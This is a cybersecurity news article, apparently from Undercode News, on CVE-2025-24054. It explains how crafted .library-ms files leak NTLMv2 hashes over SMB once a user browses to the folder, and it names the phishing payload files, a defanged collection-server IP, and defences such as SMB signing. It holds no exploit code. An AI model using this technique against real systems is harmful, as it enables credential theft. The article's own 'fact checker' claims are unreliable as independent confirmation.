New Windows Flaw Exploited to Leak NTLM Hashes: What You Need to Know About CVE- UNDERCODE NEWS

A newly discovered Windows vulnerability, CVE-2025-24054, has drawn immediate attention from cybersecurity professionals and threat actors alike. This high-risk flaw enables attackers to exfiltrate NTLM authentication hashes with nearly no user interaction—posing a significant threat to enterprise and individual users. Alarmingly, exploitation began just days after Microsoft released an official patch.

This vulnerability targets Windows systems and can be triggered by something as subtle as a user merely navigating to a folder containing a specially crafted .library-ms file. This minimal engagement—no clicking, no running—initiates an SMB authentication process, which leaks sensitive NTLMv2-SSP hashes to an attacker-controlled server.

Let’s break down the events, implications, and expert analysis of this alarming exploit in the sections below.

Key Events and Insights in

CVE-2025-24054 affects Windows operating systems and was disclosed with a patch from Microsoft on March 11, 2025.
Attackers didn’t wait. Exploitation in the wild began by March 19, highlighting the lag between patch release and widespread implementation.
The flaw is activated via .library-ms files, which are used in Windows to create saved searches.
Simply navigating to a folder with a malicious .library-ms file triggers the vulnerability—no execution required.
Victims unwittingly leak NTLMv2-SSP hashes, critical authentication data for Windows environments.
These hashes can be used in NTLM relay attacks, potentially granting attackers unauthorized access to network resources.
Malicious files were distributed through phishing campaigns, often embedded as Dropbox download links.
Attackers used zip archives like xd.zip, which contained multiple payload files:

– `xd.library-ms` (CVE-2025-24054)

– `xd.url` (linked to CVE-2024-43451)

– `xd.website` (SMB trigger via UNC)

– `xd.lnk` (SMB hash leaker)

Targeted campaigns were observed primarily in Poland and Romania, but hash collection servers were based globally—including in Russia, Turkey, Bulgaria, Australia, and the Netherlands.
One server (IP: 159.196.128[.]120) had historical ties to APT28 (Fancy Bear), though no attribution is officially confirmed for this campaign.
A second wave of attacks (around March 25) upped the ante by dropping unarchived .library-ms files—making it even easier for victims to trigger the exploit.
Check Point Research compared this to an older issue: CVE-2024-43451, suggesting a possible mutation or code reuse.
Microsoft corrected initial documentation confusion, reclassifying the vulnerability from CVE-2025-24071 to CVE-2025-24054.
The vulnerability demonstrates how harmless-looking file types can become vehicles for advanced credential theft.
Affected systems that lack SMB signing or NTLM relay protection are particularly vulnerable to post-exploitation movements.

What Undercode Say: An Analytical Breakdown

This vulnerability exemplifies the evolution of low-interaction exploits in modern cyberattacks. What makes CVE-2025-24054 particularly dangerous isn’t just the technical mechanics—but how seamlessly it blends into everyday user activity. Imagine a user opening a folder to organize files and unknowingly initiating a credential leak to a hostile server halfway across the globe.

The attack vector leverages .library-ms files, an often overlooked but powerful component in Windows. These are generally trusted by default, as they’re tied to Windows Explorer and used for saved searches. That trust is precisely what attackers exploited. Because Windows automatically initiates SMB authentication attempts even without executing the file, adversaries don’t need much to compromise a system.

The delivery mechanism—Dropbox links in phishing emails—adds another layer of deception. Users accustomed to receiving cloud storage links may not think twice about downloading and opening such files, especially if they appear to come from familiar sources. Once extracted, merely browsing the folder is enough.

What’s most unsettling is the global scale of the campaign. With relay servers located in countries spanning five continents, this wasn’t a small test run. It was a coordinated, possibly state-sponsored, effort to amass credential hashes rapidly. The mention of a server previously linked to APT28 (even if not confirmed) should raise red flags for national security entities.

Even more alarming is how this vulnerability ties into NTLM relay attacks. Once attackers have an NTLM hash, they can impersonate users within the same network, often bypassing multi-factor authentication if misconfigurations exist. This allows lateral movement within corporate systems, access to sensitive data, and potentially, full domain compromise.

For defenders, this incident reinforces several critical takeaways:

– Patch deployment must be immediate, not optional.

SMB signing and NTLM relay protections should be mandatory, not recommended.
User education remains a key pillar. While the exploit needs no click, users must be trained to avoid interacting with unsolicited content.
File inspection at the endpoint level needs to go beyond executable formats. Even non-executables like .library-ms, .lnk, and .url files should trigger alerts under suspicious contexts.

From a cybersecurity policy perspective, it’s essential to recognize that patches alone are no longer sufficient. Organizations must invest in proactive threat hunting, network segmentation, and zero-trust architectures to mitigate the impact of such zero-click or minimal-click threats.

Lastly, this case illustrates the need for a more aggressive global dialogue on vulnerability disclosure and exploit commodification. If threat actors can operationalize a newly disclosed flaw in under 10 days, defenders are always on the back foot. The solution isn’t just faster patching—it’s about anticipating attack behavior and building resilient environments that don’t fail when a single link in the chain is compromised.

Fact Checker Results

– Confirmed: CVE-2025-24054 is actively exploited post-patch.

Verified: The NTLMv2 hash leakage can occur via simple folder navigation.
Supported: SMB servers involved are spread globally, with some linked to known threat actors.